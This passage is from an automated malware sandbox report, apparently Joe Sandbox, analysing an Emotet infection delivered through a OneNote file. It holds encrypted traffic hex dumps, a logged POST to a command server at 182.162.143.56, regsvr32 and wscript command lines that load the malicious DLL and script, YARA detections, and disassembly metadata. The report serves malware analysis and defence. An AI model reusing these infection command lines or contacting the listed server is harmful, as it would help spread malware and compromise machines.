2023-03-17 08:24:06 UTC	216	IN	Data Raw: e8 a8 dc cb 99 23 d2 8d dd 6b 23 fb 17 02 05 19 17 ac d7 ea 11 1d 7f 14 b3 9f be 84 71 50 09 9e aa 59 3c e9 7c 05 29 60 63 73 4e e3 1f 24 19 46 6b 98 a2 a7 31 13 3c 4c 7f b5 e9 b2 7b 0f 09 e9 05 67 75 9c 2f 20 c3 a6 74 e1 35 6e 32 43 34 0c b8 a9 2e 33 a1 2c be ac d8 e9 0d bc 18 77 48 23 ee 4d 1b 43 39 e1 85 13 6a 3c 8e 98 f0 95 74 eb dc 09 96 06 10 40 89 d3 6b 00 a6 20 11 76 31 09 45 37 83 17 0c 7b 11 f5 3f 2b b6 26 65 73 97 0c 71 78 70 d2 fd a9 54 05 61 48 bf 0c 17 52 e6 14 21 a5 d7 78 da 72 61 07 95 37 0c 5b e4 7d 1b 1b 34 a5 41 43 b4 00 55 48 66 06 01 45 bb 65 75 72 bd 0c 17 52 ac 44 45 24 8c 86 33 0b 82 33 60 bc 52 de 7c fe 7b 0f 49 7c 11 de ba b3 35 5c 74 b7 46 4d 36 e6 15 66 04 f3 0c 62 6b 81 25 40 05 5a 03 26 45 b6 00 77 18 27 7e c6 c0 aa 05 46 71 Data Ascii: #k#qPY<\|)`csN$Fk1<L{gu/ t5n2C4.3,wH#MC9j<t@k v1E7{?+&esqxpTaHR!xra7[}4ACUHfEeurRDE$33`R\|{I\|5\tFM6fbk%@Z&Ew'~Fq
2023-03-17 08:24:06 UTC	224	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	224	IN	Data Raw: 34 30 30 30 0d 0a 3d 3c f8 04 18 49 69 20 bd 8d 75 12 c8 b7 cc 2a ea ec d1 60 35 7a 1a ad 9c 7f cf aa c0 1c 4b 39 3f ec 35 46 01 1c 5a 74 71 bf 78 7d 78 10 74 21 51 71 f4 00 ba 26 4f 48 a6 20 11 46 60 3b 45 37 08 de 64 4f 35 f8 53 0f 4d 6c c0 37 11 48 a5 38 38 59 fb 2c 14 15 14 13 34 48 f2 0e 4f 34 63 e5 79 5e 67 68 c3 dc fe 92 4c 4f 51 31 be 67 55 56 bb c5 1b fa f0 0c 18 6d d2 29 8e ce 96 06 10 70 69 b5 6b 00 e0 28 11 42 4a 60 ca f5 c5 27 0c 53 79 ce bf e9 b6 26 65 73 88 59 71 78 57 1d 18 58 61 a8 15 66 04 c9 7f 46 5b b0 b8 67 06 fb 27 02 75 d3 5d fb 25 ea 11 1d 0f d0 5b c7 7f c8 71 50 41 3c b7 1d 18 50 bb 75 75 76 bf 04 17 5e e2 44 45 4c f2 3e 77 06 7d 37 44 53 c0 5a 53 39 3f ec 35 46 75 65 07 74 71 c0 f7 32 14 c7 bb 6d 75 76 78 c5 7e f2 9c e1 4a ae 8d Data Ascii: 4000=<Ii u*`5zK9?5FZtqx}xt!Qq&OH F`;E7dO5SMl7H88Y,4HO4cy^ghLOQ1gUVm)pik(BJ`'Sy&esYqxWXafF[g'u]%[qPA<Puuv^DEL>w}7DSZS9?5Fuetq2muvx~J
2023-03-17 08:24:06 UTC	232	IN	Data Raw: 8b bb ec 64 35 f1 1e c6 b2 d6 6f 99 f9 82 66 f3 fe c2 77 eb 0c a3 b4 31 91 4d 6f a6 c3 a9 55 c1 52 29 71 a8 19 eb 2e e0 e0 11 d5 30 d6 38 ba 7e cf 55 60 e2 21 1d 0f a0 34 82 c8 07 11 5c fa 3d d8 1d b7 25 d8 65 da 07 d8 09 b8 34 63 48 ea 29 cd f3 17 02 65 df f8 eb d7 94 a2 7c d7 8f d7 62 41 82 50 9c 7a f3 f4 e3 3d 68 30 21 d0 07 dc da b7 62 6b bf fa 50 35 7a 92 4b ad 27 c5 26 c0 5e 60 39 3f a0 34 8a 7a 8b 3a 30 83 91 ea a7 c3 97 8f e2 1a 42 34 a1 e2 9c 94 ff a6 21 d1 20 0a 26 45 b6 01 b7 6f 42 9a c6 be 6e 95 48 2b bc ca b5 1c 9c 36 d8 49 8c 62 21 6b 42 f3 0d db 83 a4 00 61 e5 70 92 b5 1b 45 37 c5 16 c0 65 80 39 3f aa 04 8a 8e 55 08 5a f0 0d d4 8f d6 55 1e aa 14 aa bf 0d d7 8a 55 59 61 64 f2 3f bf 59 73 37 44 1b a3 b3 2d b4 7a d3 b0 07 ad 53 7d fd 35 5c 04 Data Ascii: d5ofw1MoUR)q.08~U`!4\=%e4cH)e\|bAPz=h0!bkP5zK'&^`9?4z:0B4! &EoBnH+6Ib!kBapE7e9?UZUUYad?Ys7D-zS}5\
2023-03-17 08:24:06 UTC	240	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	240	IN	Data Raw: 34 30 30 30 0d 0a fb 2c 14 09 e3 d0 34 48 f4 26 4f 2c ed 84 35 7a 94 62 61 07 6e 93 28 6b 2d bc ff 5e 2e a5 05 67 15 8c f3 78 3c e0 d6 80 b3 8b 10 fb 8d 4a 36 f5 ea 44 45 44 b1 5e ac d9 c4 73 60 73 4b 3c 9a c6 be 67 55 42 b7 a6 7f 49 f0 0c 18 79 9c a6 ca de 96 06 10 6c 1b f1 6b 00 e0 28 11 5e 94 c3 cb 85 c5 27 0c 4f cd 02 b7 99 fa 26 65 67 be 30 55 58 d4 72 c4 96 cf 69 d8 47 b8 4b 32 62 23 8b b6 2c be b1 1b ad 19 13 14 1b ab af 25 66 77 d4 91 ae c8 0f 11 7c 24 30 b7 b5 74 eb dc 41 96 07 c4 b8 3f 62 6b 33 a1 ed 70 8e 94 63 55 9a 6b 53 28 ea 10 29 79 24 3b 98 80 2e 25 7b f0 0d 2c 38 c7 5e 99 aa 14 52 bd 0d df a5 2e 10 7a 81 35 7a d2 63 55 cf 85 ac d7 ea 20 29 ad 56 8e 9d c0 36 25 d9 fc d8 ab d2 79 78 b9 64 b9 85 71 a8 57 47 6b 00 d9 39 74 36 fd ad 08 d7 b3 Data Ascii: 4000,4H&O,5zban(k-^.gx<J6DED^s`sK<gUBIylk(^'O&eg0UXriGK2b#,%fw\|$0tA?bk3pcUkS()y$;.%{,8^R.z5zcU )V6%yxdqWGk9t6
2023-03-17 08:24:06 UTC	248	IN	Data Raw: d8 63 96 bc 11 14 a3 26 aa b0 7b 0f 59 a5 05 67 15 54 71 78 3c b1 c0 be cf de e9 76 77 48 33 8b 7a ff 9e 9b f2 3f 98 43 4a 37 44 eb e3 00 4d 96 b4 66 ba 95 a0 68 ff a5 98 7b f6 98 d5 6d b9 6c 9a 83 59 83 39 a3 06 cb 67 e5 40 b1 86 1f 17 69 c5 26 e3 90 41 63 61 ec 34 a5 2e c0 35 74 1a 3d fb 0a b5 2d f7 99 68 cc d7 70 b8 2f ac f7 80 a5 df 7e da 73 82 f6 29 94 2a ea 10 fe 29 a0 71 62 86 06 fa d4 2c 78 3c 32 79 a7 12 a8 14 8d b5 3d fc 2e 97 04 61 a3 70 3d 57 4f 45 37 2f 16 6f 31 ec 7c 78 aa 34 25 13 a2 35 74 b0 15 7b 54 57 2d 77 3c d8 07 73 c9 46 25 7d 3e 68 64 be 3f 14 62 ce 7a 8b 17 a3 2e a2 b2 72 e0 f8 26 65 6b 7d fd 2d 5c 1c b1 de df 30 21 e9 e1 21 48 33 8b 38 fe 9e 9b 7d f1 16 c9 0d be 01 5c ef 2e 22 28 cf 2b 71 e3 04 04 b4 38 71 78 bd 1c 7b 06 78 de ae Data Ascii: c&{YgTqx<vwH3z?CJ7DMfh{mlY9g@i&Aca4.5t=-hp/~s)*)qb,x<2y=.ap=WOE7/o1\|x4%5t{TW-w<sF%}>hd?bz.r&ek}-\0!!H38}\."(+q8qx{x
2023-03-17 08:24:06 UTC	256	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	256	IN	Data Raw: 34 30 30 30 0d 0a 8c 9a 33 62 aa a5 41 62 35 7a 5f a7 c0 17 42 53 28 dd e6 c6 c0 aa fc 42 47 43 35 a1 c1 76 82 d8 89 48 36 21 51 46 38 6e 8c a5 ee 18 67 64 35 aa 56 26 45 bc c1 4b 2e 6b 65 b4 33 eb 72 ab c8 ce 2d 72 71 78 74 d4 71 fc b1 a4 49 44 34 48 96 81 94 ff a0 c1 2d 7c 53 26 43 b6 f1 4b 2e 6b 65 8f c5 32 71 a5 c4 53 33 74 71 c7 f9 59 3c e9 b5 31 57 42 34 77 b0 9d 94 81 e4 74 33 7a 53 cc b6 c8 bb d2 ad 7b 63 39 3f 49 ec 9d be 82 98 64 77 78 3c 5f bd dd 20 27 51 42 aa b0 ce 61 e0 85 71 62 35 7a da 62 61 77 0c d8 6d f3 2d b0 7b 0f 49 e9 c4 5b 33 74 71 f1 78 7d 0c e3 b5 01 57 42 34 c1 77 46 43 8b e4 4c 33 7a 53 af 01 13 64 bb 62 0d 9b c6 ba eb 7e e7 01 42 35 74 b6 3d bc 62 4f 68 30 99 2c 4e fa 8f b2 2f eb 71 94 14 cf f1 1e a6 b2 d6 fc 56 69 7b 61 f8 d5 Data Ascii: 40003bAb5z_BS(BGC5vH6!QF8ngd5V&EK.ke3r-rqxtqID4H-\|S&CK.ke2qS3tqY<1WB4wt3zS{c9?Idwx<_ 'QBaqb5zbawm-{I[3tqx}WB4wFCL3zSdb~B5t=bOh0,N/qVi{a
2023-03-17 08:24:06 UTC	264	IN	Data Raw: 6d 1c ee 6c 90 a0 3c 1d c8 07 11 54 99 49 4b a7 c3 af 75 56 dc a8 34 48 b2 27 1c fe ce 9b ca 11 16 51 23 be 01 24 43 2e 12 48 b6 6e 06 e9 04 34 b8 78 31 c0 9d f9 9c c8 f1 c0 55 cb 79 3f b2 17 1c d2 41 c6 2d bd 16 89 53 0d 44 53 a3 26 ca ce de ea 9b 67 c8 16 9a f5 04 d7 ca 7b 37 68 f7 64 f6 99 57 48 33 e3 2e a7 09 df 35 7a d2 53 e2 da b1 59 28 ac 20 46 58 42 71 62 c0 06 4a cc bc 78 3c 15 b7 a7 b1 54 2e bc 3d 49 33 e9 2e 7f 25 ef 70 dd d8 73 ea de 19 a8 d7 94 a2 7c 48 5b 78 62 41 82 50 03 7f 13 79 2e 37 e1 75 56 3a 07 43 20 ba 27 1c 81 14 13 a5 99 7d ad ce 72 33 bb 50 40 9a c6 f8 6e 06 90 bd 43 35 f5 34 0f a4 f5 c3 97 78 aa 89 c3 41 3f f2 8f 29 4d ea 21 42 f3 16 c9 82 72 33 d1 f6 6b 65 f8 52 5c 75 e3 34 34 dc 79 71 78 b7 1c 4b e1 75 d2 96 07 43 df b7 62 6b Data Ascii: ml<TIKuV4H'Q#$C.Hn4x1Uy?A-SDS&g{7hdWH3.5zSY( FXBqbJx<T.=I3.%ps\|H[xbAPy.7uV:C '}r3P@nC54xA?)M!Br3keR\u44yqxKuCbk
2023-03-17 08:24:06 UTC	272	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	272	IN	Data Raw: 34 30 30 30 0d 0a 61 2c bc 32 63 6e c0 fe 4b d6 07 69 65 39 87 e8 39 62 41 aa db 89 8e 87 fb 1c 24 01 f6 21 51 83 51 50 38 e3 2e 18 a6 3e ca 85 d2 6b 5d 8c fe dd aa ea 10 21 77 e7 cc e4 86 06 15 e2 c6 78 3c d8 79 48 48 f3 ae bd 8e 08 33 62 6b c1 0c 44 36 fb 26 06 34 53 4d 53 a3 2e 45 b2 7a 33 99 11 32 bc ca 3c f8 7d 7c 26 3c 68 78 a4 91 4d b0 99 32 62 6b b8 3a af 35 7a ba ad b8 c8 bb 94 6d 4b 75 60 3f 2b c9 e7 51 01 3d ff 3c 58 cb b8 84 ed 20 63 59 69 fe 99 da 61 a1 c1 88 61 bc 37 73 e7 28 17 4c d2 65 4b 85 49 49 db f0 17 61 f8 33 00 81 bf 79 41 0f f1 30 21 d0 07 2c 2d 3d 62 6b c1 0c 7c 31 f1 1e 3e b2 d6 6f 99 f9 82 66 f3 fe c2 75 eb 0c 5b f4 19 69 7e bd 2c 24 89 e2 22 51 85 71 60 48 20 6b 00 a0 01 1d 74 d2 63 6d a2 9b 53 28 ea 10 11 46 88 e7 72 86 06 05 Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}\|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk\|1>ofu[i~,$"Qq`H ktcmS(Fr
2023-03-17 08:24:06 UTC	280	IN	Data Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17 Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI\|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
2023-03-17 08:24:06 UTC	288	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	288	IN	Data Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;\|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`\|%@EC.uqQ?9q
2023-03-17 08:24:06 UTC	296	IN	Data Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c Data Ascii: -h5DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?\|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdplsE,>wrl
2023-03-17 08:24:06 UTC	304	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	304	IN	Data Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2 Data Ascii: 16009=+eACVqxH>hQB\|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq\|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49707	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 08:25:01 UTC	310	OUT	POST /mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/ HTTP/1.1 Connection: Keep-Alive Content-Length: 0 Host: 182.162.143.56
2023-03-17 08:25:02 UTC	310	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 17 Mar 2023 08:24:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2023-03-17 08:25:02 UTC	310	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ONENOTE.EXEPID: 5000, Parent PID: 3320

General

Target ID:	0
Start time:	09:23:36
Start date:	17/03/2023
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_4.one
Imagebase:	0x1190000
File size:	1676072 bytes
MD5 hash:	8D7E99CB358318E1F38803C9E6B67867
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 1716, Parent PID: 5000

General

Target ID:	10
Start time:	09:24:02
Start date:	17/03/2023
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Imagebase:	0xc90000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.341725142.00000000057F2000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.339989514.0000000005873000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 0000000A.00000003.337950872.00000000057E9000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.337950872.00000000057E9000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 0000000A.00000003.339286928.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.339286928.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 3984, Parent PID: 1716

General

Target ID:	11
Start time:	09:24:06
Start date:	17/03/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll
Imagebase:	0x1080000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4888, Parent PID: 3984

General

Target ID:	12
Start time:	09:24:07
Start date:	17/03/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll"
Imagebase:	0x7ff7d53f0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.320685564.0000000001060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1868, Parent PID: 4888

General

Target ID:	13
Start time:	09:24:12
Start date:	17/03/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RPJQOdVdSbhDZ\IMSnbfr.dll"
Imagebase:	0x7ff7d53f0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.815803054.0000000000CC1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.815608298.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000D.00000002.816093001.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 5136, Parent PID: 5000

General

Target ID:	14
Start time:	09:24:17
Start date:	17/03/2023
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Wow64 process (32bit):	true
Commandline:	/tsr
Imagebase:	0xea0000
File size:	157872 bytes
MD5 hash:	DBCFA6F25577339B877D2305CAD3DEC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 4888, Parent PID: 3984COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	7.5%
Signature Coverage:	6%
Total number of Nodes:	332
Total number of Limit Nodes:	11

Executed Functions

Function 01020000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 01020344
VirtualAlloc.KERNELBASE ref: 0102038A
VirtualAlloc.KERNELBASE ref: 010203A4
VirtualProtect.KERNELBASE ref: 0102085C
RtlAddFunctionTable.KERNEL32 ref: 010208E9

Strings

Load, xrefs: 01020095
Cach, xrefs: 01020100
ualP, xrefs: 010200CD
temI, xrefs: 0102011F
tion, xrefs: 010200F9
GetN, xrefs: 01020107
ncti, xrefs: 01020141
rote, xrefs: 010200D5
ativ, xrefs: 0102010F
RtlA, xrefs: 01020133
o, xrefs: 0102012E
ualA, xrefs: 010200B5
eSys, xrefs: 01020117
Virt, xrefs: 010200AD
Libr, xrefs: 0102009D
ddFu, xrefs: 0102013A
hIns, xrefs: 010200EB
lloc, xrefs: 010200BD
onTa, xrefs: 01020148
truc, xrefs: 010200F2
nf, xrefs: 01020127
ct, xrefs: 010200DD
Flus, xrefs: 010200E4
Slee, xrefs: 01020084
aryA, xrefs: 010200A5
Virt, xrefs: 010200C5

Memory Dump Source

Source File: 0000000C.00000002.320648034.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1020000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 394283112-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: d130f6d0e7c39660a05e00b1e56fbefdb99960ea923fe6ba3af3e0a5513bce07
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 00520130A18B588BD769DF18D8856BAB7F1FB88304F14462DE8CBC7215DB34E542CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0129709C Relevance: 11.5, Strings: 9, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#Vk, xrefs: 0129731C
U[, xrefs: 012972BB
W(P, xrefs: 0129727F
$, xrefs: 0129725F
_L, xrefs: 012974B0
_o, xrefs: 012970C1
8, xrefs: 01297172
k|, xrefs: 01297446
xD, xrefs: 012970C9

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
API String ID: 0-383957222
Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
Instruction ID: 6b809234ac2bd0441cb2713c1040786a47992b599e78b3a8a08483eec13dfcce
Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
Instruction Fuzzy Hash: 4CC1DD71519780AFD388DF28C58A91BBBF0FBD4748F906A1DF88686260D7B4D909CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrFindResource_U.NTDLL ref: 0000000180010CCB
LdrAccessResource.NTDLL ref: 0000000180010CEB
NtAllocateVirtualMemory.NTDLL ref: 0000000180010D19

Strings

@, xrefs: 0000000180010CF5
ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk, xrefs: 0000000180010C3B
LXGUM, xrefs: 0000000180010C74

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
